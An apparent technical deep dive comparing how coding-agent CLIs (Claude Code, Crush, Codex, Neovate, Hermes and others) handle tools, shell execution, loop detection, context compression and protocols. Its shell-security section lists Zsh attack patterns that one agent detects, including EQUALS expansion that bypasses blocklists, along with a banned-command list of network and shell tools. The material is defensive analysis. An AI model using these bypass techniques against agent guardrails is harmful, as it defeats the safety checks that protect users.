← AI Coding Guides β€Ί Deep Dives
Architecture β€’ Tools β€’ Shell β€’ Protocols

How these coding agents are actually built

Under the surface, these repos cluster into a few distinct shapes: bespoke terminal runtimes, provider multiplexers, protocol bridges, and orchestration frameworks. Their tool design choices tell you which camp they belong to.

(Alright, ad over. Back to the serious technical analysis.)

The four architecture families

Bespoke terminal kernels

Claude Code, Crush, and Codex feel like software products first. Tool schemas, permissions, terminal UX, and recovery behavior are baked into the runtime rather than bolted on through a generic orchestration layer. Crush is uniquely notable for shipping native LSP integration (diagnostics and symbol references) and Sourcegraph code search as first-class built-in tools. Codex stands out as a Rust-native binary built around a Ratatui TUI, organized as a 70+ crate Cargo workspace, with platform-specific sandboxes (Seatbelt on macOS, bubblewrap on Linux, Windows tokens).

Provider-matrix CLIs

Mux, Neovate, and Qwen Code invest heavily in model registries, provider catalogs, and config resolution. The runtime exists partly to normalize many providers into one interface.

Protocol-heavy adapters

Pochi and Kimi CLI are notable for bridge code: MCP adapters, ACP translation, vendor packages, and importers from adjacent ecosystems.

Sandbox and orchestration platforms

DeerFlow and OpenHands focus on multi-step execution environments. They care about app servers, middleware, sandboxes, and delegating work as much as a single interactive CLI session.

Self-improving multi-platform agents

Hermes (Nous Research) is in a category of its own: persistent skill learning, multi-platform messaging gateways, RL training pipelines, and a MoA synthesis tool. Not a coding-only agent, but the most feature-rich architecture in the set.

How tool calls are represented

Repo Tool representation What stands out Editing style
Claude Code Typed internal tool modules with schemas, metadata, UI, and permission hooks Tools are product features, not just JSON functions. There are dedicated plan, task, worktree, slash-command, and MCP surfaces. Bespoke file tools and patch flows under a large central runtime
Crush Go implementations paired with self-describing tool docs Feels handcrafted. The tooling layer is readable, cohesive, and consistent with the terminal product. Custom file, shell, and LSP-oriented operations
Qwen Code Declarative tools translated into provider-facing function declarations The tool system is cleanly separated from model config, confirmation rules, and MCP discovery. Structured edit tools plus guarded shell execution
Neovate Code AI SDK-style tools with strong typing and bash guards Its bash tool is unusually opinionated about banned commands, substitutions, and risky patterns. CLI tools with explicit safety checks and MCP conversion
Pochi Built-in tool map first, MCP tools second Mixes direct tools, background jobs, diff application, and vendor-specific agent packages. Search/replace and diff-centric editing with worktree workflows
Kimi CLI Python tool modules and ACP conversion blocks Notable bridge layer that converts internal diffs and tool results into ACP-friendly structures. Terminal and edit tools shaped for protocol export
DeerFlow LangGraph/LangChain tool assembly from config, MCP, and subagent sources Tools are part of a harness. Middleware and role configuration matter as much as the tools themselves. Sandboxed file tools plus delegated subagent execution
OpenHands Legacy function-calling tools mapped into actions The local repo still shows classic CodeAct function tooling, but it is not the full story for the newer system. Sandbox actions such as bash execution and string-replace editing
Mux Broader workspace/runtime orchestration around provider-aware agents Less obviously tool-schema-centric in the docs I read; more focused on workspaces, execution environments, and provider routing. Workspace-driven execution with desktop/browser product framing
Hermes Python tool modules with COMMAND_REGISTRY autodiscovery pattern A single CommandDef list auto-derives CLI autocomplete, Telegram menu, Slack subcommand map, and gateway help simultaneously. MoA and Delegate tools are unique in this set. Standard read/write/shell tools plus skill_manager, MoA synthesis, sub-agent delegation
Pi Mono TypeBox JSON schemas with AJV validation, 7 core tools Multi-disjoint edits per call, file mutation queue, fuzzy matching (Unicode normalization), uniqueness validation. Extensions can register custom tools with full TypeBox schemas. Precise text replacement (not diffs) with reverse-order application, line ending preservation, BOM handling
Codex codex-tools crate with ToolSpec/ToolDefinition, JSON Schema via schemars, 20+ built-in tools Rust-native tool definitions derive JSON Schema automatically. The tool registry is tightly integrated with the Ratatui TUI and permission model. Structured tool calls with Rust-type safety, integrated with shell and file operations

The big divider is whether tools are treated as a neutral transport format or as a first-class product surface. Claude Code and Crush are on the product side of that line.

Shell and CLI execution

Repo Shell model Background support Guardrails
Claude Code Rich shell and process tooling inside the main runtime Yes Permission modes, explicit tool policies, and runtime-level orchestration
Neovate Code Bash tool with timeout, truncation, and risk checks Some long-running cases Banned commands, command-substitution checks, and high-risk detection
Qwen Code Shell tool with command parsing and read-only detection Yes Permission decisions and shell classification before execution
Pochi Command execution plus explicit background-job support Yes Separate tools for foreground commands and long-running jobs
Kimi CLI Fresh shell-oriented tool calls plus shell mode UX Yes, via task management Task-oriented UX and protocol-aware terminal capability handling
Crush Native Go shell service integrated with permissions and TUI Yes Product-level permissions, service boundaries, and custom runtime control
DeerFlow Sandboxed bash-like operations inside a harness Yes Middleware plus sandbox abstractions keep execution constrained
OpenHands Sandbox bash actions exposed to the agent Yes Isolation comes from the runtime sandbox more than the tool schema itself
Mux Workspace and runtime execution, often closer to a persistent environment Yes Provider routing is central; shell policy is less front-and-center in the docs than in Neovate or Claude
Hermes Shell tool plus 6 remote execution backends: local, Docker, SSH, Daytona, Modal, Singularity Yes Tirith binary verifies execution environment authenticity via SHA-256 + cosign provenance before runs
Pi Mono Pluggable BashOperations interface with streaming output, detached process trees Yes (via detached processes + killProcessTree) Extension-based (BashSpawnHook), commandPrefix option, no built-in bans β€” security is the user's responsibility (container or extension)
Codex zsh-fork backend (macOS), Unix escalation (others), execpolicy rule engine Yes Platform-specific sandboxes: Seatbelt (macOS), bubblewrap (Linux), Windows tokens; execpolicy rule engine for fine-grained command authorization

Shell security depth comparison

The agents vary enormously in how much engineering goes into preventing the bash tool from doing damage. Here is the full spectrum from most to least defensive:

Claude Code β€” Tree-sitter AST analysis and Zsh attack catalog

Claude Code imports tree-sitter shell grammar to parse command ASTs before execution. The bashSecurity.ts file contains a catalog of Zsh-specific attack vectors:

Attack patternWhat it doesHow detected
zmodloadLoads Zsh modules including network, file descriptor, and cryptographic modulesCommand name prefix match
emulate -cEvaluate code in a sub-shell with emulated environment β€” effectively evalFlag pattern match
sysopen / sysread / syswriteLow-level file descriptor operations from zsh/system moduleCommand name match
=cmd (EQUALS expansion)Resolves to the full path of cmd, bypassing binary-name blocklistsAST token shape
<() / >()Zsh process substitution, creates anonymous FIFOsAST subtree match
$() / backtick substitutionClassic command substitution β€” but caught via tree-sitter, not regexAST node type
<#PowerShell-style comment, unexpected in a bash context β€” flags context confusionToken match

Neovate Code β€” Quote-aware pipeline parser

Neovate's bash tool uses a character-level state machine to handle quoting correctly before any security check:

// State machine tracks: inSingleQuote, inDoubleQuote, escaping
// splitPipelineSegments() respects quoting so 'echo "a|b"' is ONE segment
// hasCommandSubstitution() tracks same states to find $() and backticks

The hard-coded banned commands include some surprises beyond the obvious: aria2c, axel, curlie, http-prompt, httpie, links, lynx, w3m, xh (all web fetchers), plus shell alternatives bash, sh, fish, zsh, and the dangerous utility trio nc, telnet, eval.

Hermes β€” Binary provenance verification

Hermes takes a different approach: rather than blocking specific commands, it verifies the execution environment. The Tirith security binary is downloaded from GitHub and its SHA-256 hash is verified against a known-good value. On supported platforms, cosign provenance attestation is also checked. This is supply-chain security, not just command blocking.

Crush β€” Product-level permission gates

Crush integrates a permission system directly into its TUI. Before executing dangerous operations, the user sees a permission prompt. This is a UX-level defense rather than a parse-level one β€” appropriate for an interactive tool where the user is present.

Loop and stuck detection

What happens when an agent is spinning its wheels? Most agents don't have explicit detection. Two in this set do:

Crush β€” SHA-256 tool signature hashing

For each step, Crush computes a signature by SHA-256 hashing the concatenation of tool_name + "\x00" + tool_input + "\x00" + tool_output for every tool call in that step. It slides a window over the last 10 steps. If any signature appears more than 5 times in that window, the agent is halted as stuck.

This is robust: calling the same tool with different arguments gets a different hash. Calling it with the same arguments but getting different output (e.g., due to a flaky command) also gets a different hash. Only genuine repetition triggers the halt.

// internal/agent/loop_detection.go
windowSize = 10  // last N steps to check
maxRepeats  = 5  // halt if any signature appears this many times

Hermes β€” Per-session trajectory tracking

Hermes exports full trajectory data in <tool_call> XML tags wrapping JSON β€” a format that matches Nous Research's Hermes model fine-tuning data format. This trajectory data can be used post-hoc for RL training to reward or penalize specific action sequences.

The context compressor's iterative re-compression also detects when the same summary is being generated repeatedly (diminishing new information), allowing the RL training signal to identify "summary convergence" as a proxy for being stuck on a task.

πŸ’‘

Why most agents don't have this

Most agents rely on the model to notice it is repeating itself. Crush's explicit detection is a sign of production experience: models sometimes don't notice, and users definitely don't want to watch 50 identical tool calls scroll by.

Context compression strategies

When context windows fill up, agents need to compress history. The strategies here range from no-op to sophisticated:

Agent Strategy Key detail
Hermes 5-step algorithmic compression with structured summaries Prune old tool results β†’ protect head β†’ protect tail by token budget β†’ LLM summarize middle β†’ iterative update on re-compression. Summaries include Goal, Progress, Decisions, Files, Next Steps sections. Summary ratio: 20% of compressed content, max 12K tokens.
Neovate Code Trigger-ratio compaction + separate pruning phase Compaction fires at configurable triggerRatio (% of model context limit). Separate pruning config with protectedTools, protectTurns, minimumPrune. autoContinue mode resumes automatically after compaction.
Claude Code Rolling context with auto-compaction Built into the runtime; integrates with plan mode and memory retrieval. Less configurable than Neovate but tightly integrated with the product experience.
Qwen Code Config-driven rolling/summarization Configurable via user settings. Less implementation detail visible in public snapshot than Neovate or Hermes.
DeerFlow LangGraph checkpointer-based state management State is checkpointed per run in the LangGraph store. Thread resumption reloads only what the graph needs, rather than replaying the full conversation history.
Others Provider-default truncation Most CLIs rely on the model provider to handle context limits, either by truncating oldest messages or raising a context-length error.

Agent state machines and retry strategies

How agents handle the "what to do next" decision after each turn reveals their architectural maturity. Three agents have explicit named state transitions:

Claude Code β€” 10 terminal states, 8 continue reasons

The query engine (src/query/transitions.ts) is a named state machine with explicit exit reasons. Terminal exits: 'completed', 'blocking_limit', 'image_error', 'model_error', 'aborted_streaming', 'aborted_tools', 'prompt_too_long', 'stop_hook_prevented', 'hook_stopped', 'max_turns'.

Continue reasons (agent loops back): 'tool_use', 'reactive_compact_retry', 'max_output_tokens_recovery', 'max_output_tokens_escalate', 'collapse_drain_retry', 'stop_hook_blocking', 'token_budget_continuation', 'queued_command'. Each is a distinct named transition, not a generic "keep going" flag. Token budget fires at COMPLETION_THRESHOLD = 0.9; if per-check delta falls below DIMINISHING_THRESHOLD = 500 tokens three times, the agent is considered complete.

OpenHands β€” Temperature bumping on dead LLM responses

OpenHands' retry mixin (openhands/llm/retry_mixin.py) uses the tenacity library with a documented intentional quirk: on LLMNoResponseError when temperature is 0, it automatically sets temperature = 1.0 on the next attempt.

The reasoning: a fully deterministic model (temp=0) that returns nothing is stuck in a degenerate fixed point and will return nothing again. Adding randomness breaks the loop. This is one of the more thoughtful LLM retry patterns in the set β€” it adapts the request rather than just retrying identically.

DeerFlow β€” 200-line buckets to prevent false loop detection

DeerFlow's LoopDetectionMiddleware hashes tool name + input + output to detect repetition. But for read_file, line numbers are bucketed into 200-line groups before hashing β€” because paginated file reads of the same file look identical to the naive algorithm, but are legitimate progress.

On warn (3 repeats): inject HumanMessage("you are repeating yourself β€” wrap up"). On hard limit (5 repeats): strip tool_calls entirely from the response, forcing a plain-text answer and ending the loop definitively.

Qwen Code β€” Truncation recovery with Levenshtein validation

When the model's response is truncated mid-tool-call, Qwen Code (coreToolScheduler.ts) injects TRUNCATION_PARAM_GUIDANCE ("your previous response was truncated due to max_tokens…") to ask the model to retry, and returns TRUNCATION_EDIT_REJECTION ("tool call has been rejected to prevent writing truncated content") for any edit tool where the output is incomplete.

The scheduler imports both diff and fast-levenshtein to verify that proposed file edits are not corrupted: if a diff-patch looks syntactically valid but the Levenshtein distance between the "before" and "after" is implausible, the edit is rejected. modifiable-tool.ts additionally lets tool calls be edited in-flight by the user before execution.

Hooks and lifecycle events

Tool hooks β€” code that runs before and after tool calls β€” let external systems observe or modify agent behavior without patching the core. Three agents in this set have them as first-class concepts:

Kimi CLI β€” Three-event hooks system

The hooks/events.py module defines three events per tool call:

  • pre_tool_use(tool_name, input) β€” runs before the tool; can modify or block the call
  • post_tool_use(tool_name, input, result) β€” runs after success; can observe output
  • post_tool_use_failure(tool_name, input, error) β€” runs on failure; allows custom error handling

This hooks API enables telemetry, authorization checks, result caching, and test mocking without touching tool implementation code.

Hermes β€” Security scan hooks on skill saves

Hermes does not have a general hooks API, but it has a specific security-scan hook on the skill learning path: before any SKILL.md file is written to ~/.hermes/skills/, the content is scanned for prompt injection patterns and invisible Unicode. Similarly, MEMORY.md and USER.md are scanned on every load.

This is a security-specific hooks pattern rather than a general lifecycle API.

Pi Mono β€” 20+ lifecycle events via extensions

Pi's extension system exposes 20+ events via the ExtensionAPI: agent_start, agent_end, tool_call, tool_result, beforeToolCall, afterToolCall, message_start/end, turn_start/end, session_start/compact/tree, model_select, before_provider_request, and more.

Extensions can block, modify, or augment any tool execution. Event handlers return promises that are awaited in order, enabling synchronous interception. Custom tools, providers, renderers, widgets, and status lines are all registered through the same event-driven API.

MCP, ACP, and bridge strategy

MCP leaders

Claude Code, Qwen Code, Neovate, Pochi, and DeerFlow all show serious MCP handling. The difference is emphasis:

  • Claude treats MCP as part of a larger integrated runtime.
  • Qwen and Neovate handle discovery, connection state, and health more explicitly.
  • Pochi blends MCP with vendor and agent ecosystem imports.
  • DeerFlow folds MCP into a composable extensions system.

ACP specialist

Kimi CLI is the clearest protocol-bridge project in this set. Its ACP conversion layer is not decorative; it maps internal edits, terminal calls, and result blocks into transportable protocol content. The docs even call out current feature gaps such as missing session/set_mode and session/set_model.

Bidirectional MCP

Codex supports MCP in both directions: as a client via the codex-mcp crate (connecting to external MCP servers) and as a server via codex-mcp-server, exposed through the codex mcp-server CLI command. This lets Codex both consume external MCP tools and expose its own tools to other MCP clients.

⚠️

OpenHands is a qualified case

The local repo contains architecture, runtime, sandbox, and legacy tool/action patterns, but the project itself says the main V1 agentic core moved elsewhere. Any MCP or tool comparison for OpenHands should be read as a snapshot of the local repo, not the whole current product story.

Error handling and recovery patterns

Claude Code

Recovery is systemic: permissions, retries, tool-specific controls, command systems, and a dedicated runtime all participate. It feels designed around failure as a normal operating condition.

Neovate Code

Strong at pre-emptive failure avoidance. Its shell code tries hard to stop dangerous or malformed commands before they ever run, and its MCP manager tracks retries and connection state explicitly.

Qwen Code

Particularly good at configuration and state management. Model resolution has source precedence, runtime snapshots, and rollback-ish handling that makes the system easier to reason about.

DeerFlow

Uses middleware to absorb failure modes: clarification interrupts, dangling tool-call handling, summarization, and subagent limits. That is framework-style robustness rather than CLI-style robustness.

Crush

Calm, explicit Go-style error boundaries. Provider metadata caching and service organization make failure paths easier to trace than in sprawling dynamic runtimes.

Kimi CLI

More honest than flashy: the ACP docs document current limitations, which is often a sign of a healthy protocol mindset rather than a polished marketing wrapper.

Pi Mono

Error handling is multi-layered: tool-level errors return isError: true to the LLM for self-retry, abort signals trigger graceful cleanup (temp files closed, partial results returned), compaction failures auto-retry, and extension errors are caught and emitted via emitError() without crashing the agent. The file mutation queue prevents concurrent write races entirely.

Codex

Strict clippy configuration denies unwrap_used and expect_used across the workspace, forcing explicit error handling at compile time. Runtime recovery includes a 300s idle timeout and up to 5 stream retries before giving up.

What architecture tells you about product intent

The repos that feel the strongest are the ones whose architecture matches their promise. Claude Code promises an elite terminal coding partner, and the repo looks like a full custom runtime. Crush promises a serious CLI product, and the repo looks handcrafted for that. Qwen promises a configurable multi-provider CLI, and its model-resolution machinery backs that up. Hermes promises a self-improving multi-platform agent, and its skills system, RL infrastructure, and gateway adapters all back that up. Pi Mono promises a minimalist extensible kernel, and its 438-file codebase with differential TUI, tree sessions, and Pi Packages delivers exactly that.

The weaker-feeling designs are not necessarily bad; they are often just trying to do a broader or less opinionated job. Pochi is ambitious and eclectic. DeerFlow is powerful but framework-heavy. OpenHands is split across repo boundaries. Kimi prioritizes bridge fidelity over terminal theatrics. Those are different goals, and the code reflects them.